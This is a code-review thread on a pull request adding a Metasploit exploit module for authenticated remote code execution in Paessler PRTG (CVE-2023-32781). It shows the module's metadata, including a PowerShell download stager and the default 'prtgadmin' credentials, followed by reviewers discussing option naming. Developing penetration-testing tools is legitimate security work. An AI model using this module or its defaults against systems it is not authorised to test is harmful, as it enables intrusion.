modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb

```diff
@@ -0,0 +1,301 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PRTG CVE-2023-32781 Authenticated RCE UPDATED',
+        'Description' => %q{
+          Authenticated RCE in Paessler PRTG
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],
+        'References' => [
+          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],
+          [ 'CVE', '2023-32781']
+        ],
+        'DisclosureDate' => '2023-08-09',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 0 # Schedules takes some time to run
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'URI',
```

Comment:
We typically use the convention of `TARGETURI` for this option. It will integrate into the mixins.
```suggestion
          'TARGETURI',
```

Reply:
Changed this now in this commit: https://github.com/rapid7/metasploit-framework/pull/18568/commits/26e78071541a5d48ef46068d117aca6a158887e3

Is the referencing to datastore['TARGETURI'] valid, or is there some magic happening inside the helper function `normalize_uri` that makes this obsolete?

Reply:
`#normalize_uri` is often used with [`#target_uri`](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_client.rb#L519) which references this datastore option by name.